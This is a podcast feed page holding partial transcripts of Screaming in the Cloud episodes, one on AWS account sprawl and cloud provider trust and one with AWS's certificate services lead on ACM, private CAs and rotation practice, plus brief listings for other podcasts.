So, things like DNS records, domain names, a lot of those things where if we can capture this and centralize it early and build it in a way—especially that users are less unhappy about, like, not everyone, for example, is hosting their own—buying their own domains on personal cards and filing for reimbursement, that DNS records aren't scattered across a dozen different software projects and manipulated in different ways, then that sets us up.It may not be perfect today, but in a year, year-and-a-half, two years, we have the ability to then say, “Okay, we know what we're pointing at. What are the dangling subdomains? What are the things that are potential avenues of being taken over? What do we have? What are people doing?” And trying to understand how we can better help users with their needs day-to-day.Also as a side part of my day job is advising a startup Common Fate. Does just-in-time access management. And that's been a lot of fun to do as well because fundamentally—this is maybe a hot take—that, in a lot of cases, you really only need admin access and read-only access when you're doing really intensive work. In Temporal day job, we've got infrastructure teams that are building stuff, they need lots of permissions and it'd be very silly to say you can't do your job just because you could potentially use IAM and privilege escalate yourself to administrator. Let's cut that out. Let's pretend that you are a responsible adult. We can monitor you in other ways, we're not going to put restrictions between you and doing your job. Have admin access, just only have it for a short period of time, when you say you're going to need it and not all the time, every account, every service, all the time, all day.Corey: I do want to throw a shout-in for that startup you advise, Common Fate. I've been a big fan of their Granted offering for a while now. granted.dev for those who are unfamiliar. I use that to automatically generate console logins, do all kinds of other things. 
When you're moving between a bunch of different AWS accounts, which it kind of feels like people building the services don't have to do somehow because of their Isengard system handling it for them. Well, as a customer, can I just say that experience absolutely sucks and Granted goes a long way toward making it tolerable, if not great.Brandon: Mm-hm. Yeah, I remember years ago, the way that I would have to handle this is I would have probably a half-dozen different browsers at the same time, Safari, Chrome, the Safari web developer preview, just so I could have enough browsers to log into with, to see all the accounts I needed to access. And that was an extremely painful experience. And it still feels so odd that the AWS console today still acts like you have one account. You can switch roles, you can type in a [role 00:21:23] on a different account, but it's very clunky to use, and having software out there that makes this easier is definitely, definitely fills a major pain point I have with using these services.Corey: Tired of Apache Kafka's complexity making your AWS bill look like a phone number? Enter Redpanda. You get 10x your streaming data performance without having to rob a bank. And migration? Smoother than a fresh jar of peanut butter. Imagine cutting as much as 50% off your AWS bills. With Redpanda, it's not a dream, it's reality. Visit go.redpanda.com/duckbill. Redpanda: Because Kafka shouldn't cause you nightmares.Corey: Do you believe that there's hope? Because we have seen some changes where originally AWS just had the AWS account you'd log into, it's the root user. Great. Then they had IAM. Now, they're using what used to be known as AWS SSO, which they wound up calling IAM Access Identity Center, or—I forget the exact words they put in order, but it's confusing and annoying. 
But it does feel like the trend is overall towards something that's a little bit more coherent.Brandon: Mm-hm.Corey: Is the future five years from now better than it looks like today?Brandon: That's certainly the hope. I mean, we've talked about how we both can't predict the future, but I would like to hope that the future gets better. I really like GCP's project model. There's complaints I have with how Google Cloud works, and it's going to be here next year, and if the permission model is exactly how I'd like to use it, but I do like the mental organization that feels like Google was able to come in and solve a lot of those problems with running projects and having a lot of these different things. And part of that is, there's still services in AWS that don't really respect resource-based permissions or tag-based permissions, or I think the new one is attribute-based access control.Corey: One of the challenges I see, too, is that I don't think that there's been a lot of thought put into how a lot of these things are going to work between different AWS accounts. One of my bits of guidance whenever I'm talking to someone who's building anything, be it at AWS or external is, imagine an architecture diagram and now imagine that between any two resources in that diagram is now an account boundary. Because someone somewhere is going to have one there, so it sounds ridiculous, but you can imagine a microservices scenario where every component is in its own isolated account. What are you going to do now as a result? Because if you're going to build something that scales, you've got to respect those boundaries. And usually, that just means the person starts drinking.Brandon: Not a bad place to start, the organizational structure—lowercase organizations, not the Amazon service, Organizations—it's still a little tricky to get it in a way that sort of… I guess, I always kind of feel that these things are going to change and that the—right, the only constant is change. 
That's true. The services we use are going to change. The way that we're going to want to organize them is going to change. Our researcher is going to come out with something and say, “Hey, I found a really cool way to do something really terrible to the stuff in your cloud environment.”And that's going to happen eventually, in the fullness of time. So, how do we be able to react quickly to those kinds of changes? And how can we make sure that if you know, suddenly, we do need to separate out these services to go, you know, to decompose the monolith even more, or whatever the cool, current catchphrase is, and we have those account boundaries, which are phenomenal boundaries, they make it so much easier to do—if you can do multi-account then you've solved multi-regional on the way, you've sold failover, you've solve security issues. You have not solved the fact that your life is considerably more challenging at the moment, but I would really hope that in you know, even next year, but by the time five years comes around, that that's really been taken to heart within Amazon and it's a lot easier to be working creating services in different accounts that can talk to each other, especially in the current environment where it's kind of a mess to wire these things all together. ClickOps has its place, but some console applications just don't want to believe that you have a KMS key in another account because well, why would you put that over there? It's not like if your current account has a problem, you want to lose all your data that's encrypted.Corey: It's one of those weird things, too, where the clouds almost seem to be arguing against each other. Like, I would be hard-pressed to advise someone not to put a ‘rehydrate the entire business' level of backups into a different cloud provider entirely, but there's so steeped in the orthodoxy of no other clouds ever, that that message is not something that they can effectively communicate. 
And I think they're doing their customers a giant disservice by that, just because it is so much easier to explain to your auditor that you've done it than to explain why it's not necessary. And it's never true; you always have the single point of failure of the payment instrument, or the contract with that provider that could put things at risk. Is it a likely issue? No. But if you're running a publicly traded company on top of it, you'd be negligent not to think about it that way. So, why pretend otherwise?

Brandon: Is that a question for me because [laugh]—

Corey: Oh, that was—no, absolutely. That was a rant ending in a rhetorical question. So, don't feel you have to answer it. But getting the statement out there because hopefully, someone at Amazon is listening to this.

Brandon: That's, uh, hopefully, if you find out who's the one that listens to this and can affect it, then yeah, I'd like to send them a couple of emails because absolutely. There's room out there, there will always be room for at least two providers.

Corey: Yeah, I'd say a third, but I don't know that Google is going to have the attention span to still have a cloud offering by lunchtime today.

Brandon: Yeah. I really wish that I had more faith in the services and that they weren't going—you know, speaking of services changing underneath you, that's definitely a—speaking of services changing underneath, you're definitely doing a major disservice if you don't know—if you're going to put in work into architecting and really using cloud providers as they're meant to be used. Not in a, sort of, least common denominator sense, in which case, you're not in good shape.

Corey: Right. You should not be building something with an idea toward what if this gets deprecated. You shouldn't have to think about that on a consistent basis.

Brandon: Mm-hm. Absolutely. You should expect those things to change because they will, right, the performance impact.
I mean, the performance of these services is going to change, the underlying technology that the providers use is going to change, but you should still be able to mostly expect that at least the API calls you make are going to still be there and still be consistent come this time next year.

Corey: The thing that really broke me was the recent selling off of Google Domains to Squarespace. Nothing against Squarespace, but they have a different target market in many respects. And oh, I'm a Google customer, you're now going to give all of my information to a third party I never asked to deal with. Great. And more to the point, if I recommend Google to folks because, as has happened in years past, then they canceled the thing that I recommended, then I looked like a buffoon. So, we've gotten to a point now where it has become so steady and so consistent, that I fear I cannot, in good conscience, recommend a Google product without massive caveats. Otherwise, I look like a clown or worse, a paid shill.

Brandon: Yeah. And when you want to start incorporating these things into the core of your business, to take that point about, you know, total failover scenarios, you should, you know, from you want it to have a domain registered in a Google service that was provisioned to Google Cloud services, that whole sort of ecosystem involved there, that's now gone, right? If I want to use Google Cloud with a Google Cloud native domain name hosting service, I can't. How am—I just—now I can't [laugh]. There's, like, not workarounds available. I've got to go to some other third party and it just feels odd that an organization would sort of take those core building blocks and outsource them. [I know 00:29:05] that Google's core offering isn't Google Cloud; it's not their primary focus, and it kind of reflects that, which was a shame. There's things that I'd love to see grow out of Google Cloud and get better.
And, you know, competition is good for the whole cloud computing industry.

Corey: I think that it's a sad thing, but it's real, that there are people who were passionate defenders of Google over the years. I used to be one. We saw a bunch of them with Stadia fans coming out of the woodwork, and then all those people who have defended Google and said, “No, no, you can trust Google on this service because it's different,” for some reason or other, then wind up looking ridiculous. And some of the staunchest Google defenders that I've seen are starting to come around to my point of view. Eventually, you've run out of people who are willing to get burned if you burn them all.

Brandon: Yeah. I've always been a little, uh… maybe this is the security-privacy part of me; I've always been a little leery of the services that really want to capture and gather your data. But I always respected the Google engineering that went into building these things at massive scale. It's something beyond my ability to understand as I haven't worked in something that big before. And Google made it look… maybe not effortless, but they made it look like they knew what they were doing, they could build something really solid. And I don't know if that's still true because it feels like they might know how to build something, and then they'll just dismantle it and turn it over to somebody else, or just dismantle it completely. And I think humans, we do a lot of things because we don't want to look foolish and… now recommending Google Cloud starts to make you wonder, “Am I going to look foolish?” Is this going to be a reflection on me in a year or two years, when you got to come in to say, “Hey, I guess that whole thing we architected around, it's being sold to someone else. It's being closed down. We got to transfer and rearchitect our whole whatever we built because of factors out of our control.” I want to be rearchitecting things because I screwed it up.
I want to be rearchitecting things because I made an interesting novel mistake, not something that's kind of mundane, like, oh, I guess the thing we were going to use got shut down. Like, that makes it look like not only can I not predict the future, but I can't even pretend to read the tea leaves.

Corey: And that's what's hard is because, on some level, our job, when we work in operations and cloud and try and make these decisions, is to convince the business we know what we're talking about. And when we look foolish, we don't make that same mistake again.

Brandon: Mm-hm. Billing and security are oftentimes frequently aligned with each other. We're trying to convince the business that we need to build things a certain way to get a certain outcome, right? Either lower costs or more performance for the dollar, so that way, we don't wind up in the front page of newspapers, any kinds of [laugh] any kind of those things.

Corey: Oh, yes. I really want to thank you for taking the time to speak with me. If people want to learn more, where's the best place for them to find you?

Brandon: The best place to find me, I have a website about me, [brandonsherman.com 00:32:13]. That's where I post stuff. There's some links to—I have a [Mastodon 00:32:18] profile. I'm not much of a social, sort of post your information out there kind of person, but if you want to get a hold of me, then that's probably the best way to find me and contact me. Either that or head out to the desert somewhere, look for a silver truck out in the dunes and without technology around. It's another good spot if you can find me there.

Corey: And I will include a link to that, of course, in the [show notes 00:32:45]. Thank you so much for taking the time to speak with me today. As always, I appreciate it.

Brandon: Thank you very much for having me, Corey. Good to chat with you.

Corey: Brandon Sherman, cloud security engineer at Temporal. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud.
If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry comment that will somehow devolve into you inviting me to your new uninspiring cloud security conference that your vendor is putting on, and is of course named after an email subject line.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

Dr. NoSleep | Scary Horror Stories
Part 1 - I'm a rescue diver specialized in underwater caving. This will be my last job.

Jul 10, 2023, 38:09


This episode is brought to you by BetterHelp. Go to betterhelp.com/dns today to get 10% off your first month. Be sure to use promo code DNS at sign up.

Home Assistant Podcast
Michael Hansen on the year of the voice 2023 and what's next

Jul 9, 2023, 70:53


With 2023 the year of the voice, Rohan and Phil talk with Mike Hansen about what's being worked on, and what the future may hold. For complete show notes and more information about the topics discussed in this episode, be sure to check the notes at https://hasspodcast.io/sp009/

This episode was made possible thanks to our sponsor Home Assistant Cloud by Nabu Casa. Easily connect to Google and Amazon voice assistants for a small monthly fee that also supports the Home Assistant project. Configuration is via the User Interface so no fiddling with router settings, dynamic DNS or YAML.

Special thanks to today's guest Michael Hansen. Website: https://synesthesiam.com Twitter: @rhasspy

Hosts: Phil Hawthorne (Twitter: @philhawthorne) and Rohan Karamandi (Twitter: @rohank9)

Screaming in the Cloud
Best Practices in AWS Certificate Manager with Jonathan Kozolchyk

Jul 6, 2023, 39:50


Jonathan (Koz) Kozolchyk, General Manager for Certificate Services at AWS, joins Corey on Screaming in the Cloud to discuss the best practices he recommends around certificates. Jonathan walks through when and why he recommends private certs, and the use cases where he'd recommend longer or unusual expirations. Jonathan also highlights the importance of knowing who's using what cert and why he believes in separating expiration from rotation. Corey and Jonathan also discuss their love of smart home devices as well as their security concerns around them and how they hope these concerns are addressed moving forward.

About Jonathan

Jonathan is General Manager of Certificate Services for AWS, leading the engineering, operations, and product management of AWS certificate offerings including AWS Certificate Manager (ACM), AWS Private CA, Code Signing, and Encryption in transit. Jonathan is an experienced leader of software organizations, with a focus on high availability distributed systems and PKI. Starting as an intern, he has built his career at Amazon, and has led development teams within our Consumer and AWS businesses, spanning from Fulfillment Center Software, Identity Services, Customer Protection Systems and Cryptography. Jonathan is passionate about building high performing teams, and working together to create solutions for our customers. He holds a BS in Computer Science from University of Illinois, and multiple patents for his work inventing for customers. When not at work you'll find him with his wife and two kids or playing with hobbies that are hard to do well with limited upside, like roasting coffee.

Links Referenced:

AWS website: https://www.aws.com
Email: mailto:koz@amazon.com
Twitter: https://twitter.com/seakoz

Transcript

Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn.
This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: In the cloud, ideas turn into innovation at virtually limitless speed and scale. To secure innovation in the cloud, you need Runtime Insights to prioritize critical risks and stay ahead of unknown threats. What's Runtime Insights, you ask? Visit sysdig.com/screaming to learn more. That's S-Y-S-D-I-G.com/screaming. My thanks as well to Sysdig for sponsoring this ridiculous podcast.

Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. As I record this, we are about a week and a half from re:Inforce in Anaheim, California. I am not attending, not out of any moral reason not to because I don't believe in cloud security or conferences that Amazon has that are named after subject lines, but rather because I am going to be officiating a wedding on the other side of the world because I am an ordained minister of the Church of There Is A Problem With This Website's Security Certificate. So today, my guest is going to be someone who's a contributor, in many ways, to that religion, Jonathan Kozolchyk—but, you know, we all call him Koz—is the general manager for Certificate Services at AWS. Koz, thank you for joining me.

Koz: Happy to be here, Corey.

Corey: So, one of the nice things about ACM historically—the managed service that handles certificates from AWS—is that for anything public-facing, it's free—which is always nice, you should not be doing upcharges for security—but you also don't let people have the private portion of the cert. You control all of the endpoints that terminate SSL. Whereas when I terminate SSL myself, it terminates on the floor because I've dropped things here and there, which means that suddenly the world of people exposing things they shouldn't or expiry concerns just largely seemed to melt away.
What was the reason that Amazon looked around at the landscape and said, “Ah, we're going to launch our own certificate service, but bear with me here, we're not going to charge people money for it.” It seems a little bit out of character.

Koz: Well, Amazon itself has been battling with certificates for years, long before even AWS was a thing, and we learned that you have to automate. And even that's not enough; you have to inspect and you have to audit, you need a controlled loop. And we learned that you need a closed loop to truly manage it and make sure that you don't have outages. And so, when we built ACM, we built it saying, we need to provide that same functionality to our customers, that certificates should not be the thing that makes them go out. Is that we need to keep them available and we need to minimize the sharp edges customers have to deal with.

Corey: I somewhat recently caught some flack on one of the Twitter replacement social media sites for complaining about the user experience of expired SSL certs. Because on the one hand, if I go to my bank's website, and the response is that instead, the server is sneakyhackerman.com, it has the exact same alert and failure mode as, holy crap, this certificate reached its expiry period 20 minutes ago. And from my perspective, one of those is a lot more serious than the other. What also I wind up encountering is not just when I'm doing banking, but when I'm trying to read some random blog on how to solve a technical problem. I'm not exactly putting personal information into the thing. It feels like that was a missed opportunity, agree or disagree?

Koz: Well, I wouldn't categorize it as a missed opportunity. I think one of the things you have to think about with security is you have to keep it simple so that everyone, whether they're a technologist or not, can abide by the rules and be safe. And so, it's much easier to say to somebody, “There's something wrong. Period.
Stop.” versus saying there are degrees of wrongness. Now, that said, boy, do I wish we had originally built PKI and TLS such that you could submit multiple certificates to somebody, in a connection for example, so that you could always say, you know, my certificates can expire, but I've got two, and they're off by six months, for example. Or do something so that you don't have to close failed because the certificate expired.

Corey: It feels like people don't tend to think about what failure modes are going to look like. Because, pfhh, as an expired certificate? What kind of irresponsible buffoon would do such a thing? But I've worked in enough companies where you have historically, the wildcard cert because individual certs cost money, once upon a time. So, you wound up getting the one certificate that could work on all of the stuff that ends in the same domain. And that was great, but then whenever it expired, you had to go through and find all the places that you put it and you always miss some, so things would break for a while and the corporate response was, “Ugh, that was awful. Instead of a one-year certificate, let's get a five-year or a ten-year certificate this time.” And that doesn't make the problem better; it makes it absolutely worse because now it proliferates forever. Everyone who knows where that thing lives is now long gone by the time it hits again. Counterintuitively, it seems the industry has largely been moving toward short-lived certs. Let's Encrypt, for example, winds up rotating every 90 days, by my estimation. ACM is a year, if memory serves.

Koz: So, ACM certs are 13 months, and we start rotating them around the 11th month. And Let's Encrypt offers you 90-day certs, but they don't necessarily require you to rotate every 90 days; they expire in 90 days. My tip for everybody is divorce expiration from rotation. So, if your cert is a 90-day cert, rotate it at 45 days.
If your cert is a year cert, give yourself a couple of months before expiration to start the rotation. And then you can alarm on it on your own timeline when something fails, and you still have time to fix it.

Corey: This makes a lot of sense in—you know, the second time because then you start remembering, okay, everywhere I use this cert, I need to start having alarms and alerts. And people are bad at these things. What ACM has done super well is that it removes that entire human from the loop because you control all of the endpoints. You folks have the ability to rotate it however often you'd like. You could have picked arbitrary timelines of huge amounts of time or small amounts of time and it would have been just fine. I mean, you log into an EC2 instance role and I believe the credentials get passed out of either a 6 or a 12-hour validity window, and they're consistently rotating on the back end and it's completely invisible to the customer. Was there ever thought given to what that timeline should be, what that experience should be? Or did you just, like, throw a dart at a wall? Like, “Yeah, 13 months feels about right. We're going to go with that.” And never revisited it. I have a guess which—

Koz: [laugh].

Corey: —side of that it was. Did you think at all about what you were doing at the time, or—yeah.

Koz: So, I will admit, this happened just before I got there. I got to ACM after—

Corey: Ah, blame the predecessor. Always a good call.

Koz: —the launch. It's a God-given right to blame your predecessor.

Corey: Oh, absolutely. It's their entire job.

Koz: I think they did a smart job here. What they did was they took the longest lifetime cert that was then allowed, at 13 months, knowing that we were going to automate the rotation and basically giving us as much time as possible to do it, right, without having to worry about scaling issues or having to rotate overly frequently.
You know, there are customers who while I don't—I strongly disagree with [pinning 00:07:35], for example, but there are customers out there who don't like certs to change very often. I don't recommend pinning at all, but I understand these cases are out there, and changing it once every year can be easier on customers than changing it every 20 minutes, for example. If I were to pick an ideal rotation time, it'd probably be under ten days because an OCSP response is good for ten days and if you rotate before, then I never have to update an OCSP response, for example. But changing that often would play havoc with many systems because of just the sheer frequency you're rotating what is otherwise a perfectly valid certificate.

Corey: It is computationally expensive to generate certificates at scale, I would imagine.

Koz: It starts to be a problem. You're definitely putting a lot of load on the HSMs at that point, [laugh] when you're generating. You know, when you have millions of certs out in deployment, you're generating quite a few at a time.

Corey: There is an aspect of your service that used to be part of ACM and now it's its own service—which I think is probably the right move because it was confusing for a lot of customers—Amazon looks around and sees who can we compete with next, it feels like sometimes. And it seemed like you were squarely focused on competing against your most desperate of all enemies, my crappy USB key where I used to keep the private CA I used at any given job—at the time; I did not keep it after I left, to be very clear—for whatever I'm signing things for certificates for internal use. You're, like, “Ah, we can have your crappy USB key as a service.” And sure enough, you wound up rolling that out. It seems like adoption has been relatively brisk on that, just because I see it in almost every client account I work with.

Koz: Yeah. So, you're talking about the private CA offering which is—

Corey: I—that's right.
Private CA was the new service name. Yes, it used to be a private certificate authority was an aspect of ACM, and now you're—mmm, we're just going to move that off.

Koz: And we split it out because, like you said, customers got confused. They thought they had to only use it with ACM. They didn't understand it was a full standalone service. And it was built as a standalone service; it was not built as part of ACM. You know, before we built it, we talked to customers, and I remember meeting with people running fairly large startups, saying, “Yes, please run this for me. I don't know why, but I've got this piece of paper in my sock drawer that one of my security engineers gave me and said, ‘if something goes wrong with our CA, you and two other people have to give me this piece of paper.'” And others were like, “Oh, you have a piece of paper? I have a USB stick in my sock drawer.” And like, this is what, you know, the startup world was running their CAs from sock drawers as far as I can tell.

Corey: Yeah. A piece of paper? Someone wrote out the key by hand? That sounds like hell on earth.

Koz: [sigh]. It was a sharding technique where you needed, you know, three of five or something like that to—

Corey: Oh, they, uh, Shamir's Secret Sharing Service.

Koz: Yes.

Corey: The SSSS. Yeah.

Koz: Yes. You know, and we looked at it. And the other alternative was people would use open-source or free certificate authorities, but without any of the security you'd want, like, HSM backing, for example, because that gets really expensive. And so yeah, we did what our customers wanted: we built this service. We've been very happy with the growth it's taken and, like you said, we love the places we've seen it. It's gone into all kinds of different things, from the traditional enterprise use cases to IoT use cases. At one point, there's a company that tracks sheep and every collar has one of our certs in it.
And so, I am active in the sheep-tracking industry.

Corey: I am certain that some wit is going to comment on this. “Oh, there's a company out there that tracks sheep. Yeah, it's called Apple,” or Facebook, or whatever crappy… whatever axe someone has to grind against any particular big company. But you're talking actual sheep as in baa, smell bad, count them when going to sleep?

Koz: Yes. Actual sheep.

Corey: Excellent, excellent.

Koz: The certs are in drones, they're in smart homes, so they're everywhere now.

Corey: That is something I want to ask you about because I found that as a competition going on between your service, ACM because you won't give me the private keys for reasons that we already talked about, and Let's Encrypt. It feels like you two are both competing to not take my money, which is, you know, an odd sort of competition. You're not actually competing, you're both working for a secure internet in different ways, but I wind up getting certificates made automatically for me for all of my internal stuff using Let's Encrypt, and with publicly resolvable domain names. Why would someone want a private CA instead of an option that, okay, yeah, we're only using it internally, but there is public validity to the certificate?

Koz: Sure. And just because I have to nitpick, I wouldn't say we're competing with them. I personally love Let's Encrypt; I use them at home, too. Amazon supports them financially; we give them resources. I think they're great. I think—you know, as long as you're getting certs I'm happy. The world is encrypted and I—people use private CA because fundamentally, before you get to the encryption, you need secure identity. And a certificate provides identity. And so, Let's Encrypt is great if you have a publicly accessible DNS endpoint that you can prove you own and get a certificate for and you're willing to update it within their 90-day windows. Let's use the sheep example.
The sheep don't have publicly valid DNS endpoints and so—

Corey: Or to be very direct with you, they also tend to not have terrific operational practices around updating their own certificates.

Koz: Right. Same with drones, same with internal corporate. You may not want your DNS exposed to the internet, your internal sites. And so, you use a private certificate where you own both sides of the connection, right, where you can say—because you can put the CA in the trust store and then that gets you out of having to be compliant with the CA/Browser Forum and the WebTrust rules. A lot of the CA/Browser Forum dictates what a public certificate can and can't do and the rules around that, and those are built very much around the idea of a browser connecting to a client and protecting that user.

Corey: And most people are not banking on a sheep.

Koz: Most people are not banking on a sheep, yes. But if you have, for example, a database that requires a restart to pick up a new cert, you're not going to want to redo that every 90 days. You're probably going to be fine with a five-year certificate on that because you want to minimize your downtime. Same goes with a lot of these IoT devices, right? You may want a thousand-year cert or a hundred-year cert or cert that doesn't expire because this is a cert that happens at—that is generated at creation for the device. And it's at birth, the machine is manufactured and it gets a certificate and you want it to live for the life of that device. Or you have super-secret-project.internal.mycompany.com and you don't want a publicly visible cert for that because you're not ready to launch it, and so you'll start with a private cert.
Really, my advice to customers is, if you own both pieces of the connection, you know, if you have an API that gets called by a client you own, you're almost always better off with a private certificate and managing that trust store yourself because then you are subject not to other people's rules, but the rules that fit the security model and the threat assessment you've done.

Corey: For the publication system for my newsletter, when I was building it out, I wanted to use client certificates as a way of authenticating that it was me. Because I only have a small number of devices that need to talk to this thing; other people don't, so how do I submit things into my queue and manage it? And back in those ancient days, the API Gateways didn't support TLS authentication. Now, they do. I would redo it a bunch of different ways. They did support API key as an authentication mechanism, but the documentation back then was so terrible, or I was so new to this stuff, I didn't realize what it was and introduced it myself from first principles where there's a hard-coded UUID, and as long as there's the right header with that UUID, I accept it, otherwise drop it on the floor. Which… there are probably better ways to do that.

Koz: Sure. Certificates are, you know, a very popular way to handle that situation because they provide that secure identity, right? You can be assured that the thing connecting to you can prove it is who they say they are. And that's a great use of a private CA.

Corey: Changing gears slightly. As we record this, we are about two weeks before re:Inforce, but I will be off doing my own thing on that day. Anything interesting and exciting coming out of your group that's going to be announced, with the proviso, of course, that this will not air until after re:Inforce.

Koz: Yes. So, we are going to be pre-announcing the launch of a connector for Active Directory.
So, you will be able to tie your private CA instance to your Active Directory tree and use private CA to issue certificates for use by Active Directory for all of your Windows hosts for the users in that Active Directory tree.

Corey: It has been many years since I touched Windows in anger, but in 2003 or so, I was a mediocre Small Business Windows Server Admin. Doesn't Active Directory have a private CA built into it by default for whenever you're creating a new directory?

Koz: It does.

Corey: Is that one of the FSMO roles? I'm trying to remember offhand.

Koz: What's a Fimal?

Corey: FSMO. F-S-M-O. There are—I forget, it's some trivia question that people love to haze each other with in Microsoft interviews. “What are the seven FSMO roles?” At least back then. And have to be moved before you decommission a domain controller or you're going to have tears before bedtime.

Koz: Ah. Yeah, so Microsoft provides a certificate authority for use with Active Directory. They've had it for years and they had to provide it because back then nobody had a certificate authority, but AD needed one. The difference here is we manage it for you. And it's backed by HSMs. We ensure that the keys are kept secure. It's a serverless connection to your Active Directory tree, you don't have to run any software of ours on your hosts. We take care of all of it. And it's been the top request from customers for years now. It's been quite [laugh] a bit of effort to build it, but we think customers are going to love it because they're going to get all the security and best practices from private CA that they're used to and they can decommission their on-prem certificate authority and not have to go through the hassle of running it.

Corey: A big area where I see a lot of private CA work has been in the realm of desktops for corporate environments because when you can pass out your custom trusted root or trusted CA to all of the various nodes you have and can control them, it becomes a lot easier.
I always tended to shy away from it, just because in small businesses like the one that I own, I don't want to play corporate IT guy more than I absolutely have to.

Koz: Yeah. Trust store management is always a painful part of PKI. As if there weren't enough painful things in PKI. Trust store management is yet another one. Thankfully, in the large enterprises, there is good tooling out there to help you manage it for the corporate desktops and things like that. And with private CA, you can also, if you already have an offline root that is in all of your trust stores in your enterprise, you can cross-sign the root that we give you from private CA into that hierarchy. And so, then you don't have to distribute a new trust store out if you don't want to.

Corey: This is a tricky release and I'm very glad I'm taking the week off it's getting announced because there are two reactions that are going to happen to any snarking I can do about this. The first is no one knows what the hell this is and doesn't have any context for the rest, and the other folks are going to be, “Yes, shut up clown. This is going to change my workflow in amazing ways. I'll deal with your nonsense later. I want to do this.” And I feel like one of those constituencies is very much your target market and the other isn't. Which is fine. No service that AWS offers—except the bill—is for every customer, but every service is for someone.

Koz: That's right. We've heard from a lot of our customers, especially as they—you know, the large international ones, right, they find themselves running separate Active Directory CAs in different countries because they have different regulatory requirements and separations that they want to do. They are chomping at the bit to get this functionality because we make it so easy to run a private CA in these different regions.
There's certainly going to be that segment at re:Inforce, that's just happy certificates happen in the background and they don't think anything about where they come from and this won't resonate with them, but I assure you, for every one of them, they have a colleague somewhere else in the building that is going to do a happy dance when this launches because there's a great deal of customer heavy-lifting and just sharp edges that we're taking away from them. And we'll manage it for them, and they're going to love it.[midroll 0:21:08]Corey: One thing that I have seen the industry shift to that I love is the Let's Encrypt model, where the certificate expires after 90 days. And I love that window because it is a quarter, which means yes, you can do the crappy thing and have a calendar reminder to renew the thing. It's not something you have to do every week, so you will still do it, but you're also not going to love it. It's just enough friction to inspire people to automate these things. And that I think is the real win.There's a bunch of things like Certbot, I believe the protocol is called ACME A-C-M-E, always in caps, which usually means an acronym or someone has their caps lock key pressed—which is of course cruise control for cool. But that entire idea of being able to have a back-and-forth authentication pass and renew certificates on a schedule, it's transformative.Koz: I agree. ACM, even Amazon before ACM, we've always believed that automation is the way out of a lot of this pain. As you said earlier, moving from a one-year cert to a five-year cert doesn't buy you anything other than you lose even more institutional knowledge when your cert expires. You know, I think that the move to further automation is great. I think ACME is a great first step.One of the things we've learned is that we really do need a closed loop of monitoring to go with certificate issuance. 
So, at Amazon, for example, every cert that we issue, we also track and the endpoints emit metrics that tell us what cert they're using. And it's not what's on disk, it's what's actually in the endpoint and what they're serving from memory. And we know because we control every cert issued within the company, every cert that's in use, and if we see a cert in use that, for example, isn't the latest one we issued, we can send an alert to the team that's running it. Or if we've issued a cert and we don't see it in use, we see the old ones still in use, we can send them an alert, they can alarm and they can see that, oh, we need to do something because our automation failed in this case.And so, I think ACME is great. I think the push Let's Encrypt did to say, “We're going to give you a free certificate, but it's going to be short-lived so you have to automate,” that's a powerful carrot and stick combination they have going, and I think for many customers Certbot's enough. But you'll see even with ACM where we manage it for our customers, we have that closed loop internally as well to make sure that the cert when we issue a new cert to our client, you know, to the partner team, that it does get picked up and it does get loaded. Because issuing you a cert isn't enough; we have to make sure that you're actually using the new certificate.Corey: I also have learned as a result of this, for example, that AWS certificate manager—Amazon Certificate Manager, the ACM, the certificate thingy that you run, that so many names, so many acronyms. It's great—but it has a limit—by default—of 2500 certificates. And I know this because I smacked into it. Why? I wasn't sitting there clicking and adding that many certificates, but I had a delightful step function pattern called ‘The Lambda invokes itself.' And you can exhaust an awful lot of resources that way because I am bad at programming. 
That is why for safety, I always recommend that you iterate development-wise in an account that is not production, and preferably one that belongs to someone else.Koz: [laugh]. We do have limits on cert issuance.Corey: You have limits on everything in AWS. As it should because it turns out that whatever there's not a limit, A, free database just dropped, and B, things get hammered to death. You have to harden these things. And it's one of those things that's obvious once you've operated at a certain point of scale, but until you do, it just feels arbitrary and capricious. It's one of those things where I think Amazon is still—and all the cloud companies who do this—are misunderstood.Koz: Yeah. So, in the case of the ACM limits, we look at them fairly regularly. Right now, they're high enough that most of our customers, vast majority, never come close to hitting it. And the ones that do tend to go way over.Corey: And it's been a mistake, as in my case as well. This was not a complaint, incidentally. It was like, well, I want to wind up having more waste and more ridiculous nonsense. It was not my concern.Koz: No no no, but we do, for those customers who have not mistake use cases but actual use cases where they need more, we're happy to work with their account teams and with the customer and we can up those limits.Corey: I've always found that limit increases, with remarkably few exceptions, the process is, “Explain to you what your use case is here.” And I feel like that is a screen for, first, are you doing something horrifying for which there's a better solution? And two, it almost feels like it's a bit of a customer research approach where this is fine for most customers. 
What are you folks doing over there and is there a use case we haven't accounted for in how we use the service?Koz: I always find we learned something when we look at the [P100 00:26:05] accounts that they use the most certificates, and how they're operating.Corey: Every time I think I've seen it all on AWS, I just talk to one more customer, and it's back to school I go.Koz: Yep. And I thank them for that education.Corey: Oh, yeah. That is the best part of working with customers and honestly being privileged enough to work with some of these things and talk to the people who are building really neat stuff. I'm just kibitzing from the sideline most of the time.Koz: Yeah.Corey: So, one last topic I want to get into before we call it a show. You and I have been talking a fair bit, out of school, for lack of a better term, around a couple of shared interests. The one more germane to this is home automation, which is always great because especially in a married situation, at least as I am and I know you are as well, there's one partner who is really into home automation and the other partner finds himself living in a haunted house.Koz: [laugh]. I knew I had won that battle when my wife was on a work trip and she was in a hotel and she was talking to me on the phone and she realized she had to get out of bed to turn the lights off because she didn't have our Alexa Good Night routine available to her to turn all the lights off and let her go to bed. And so, she is my core customer when I do the home automation stuff. And definitely make sure my use cases and my automations work for her. But yeah, I'm… I love that space.Coincidentally, it overlaps with my work life quite a bit because identity in smart home is a challenge. We're really excited about the Matter standard. 
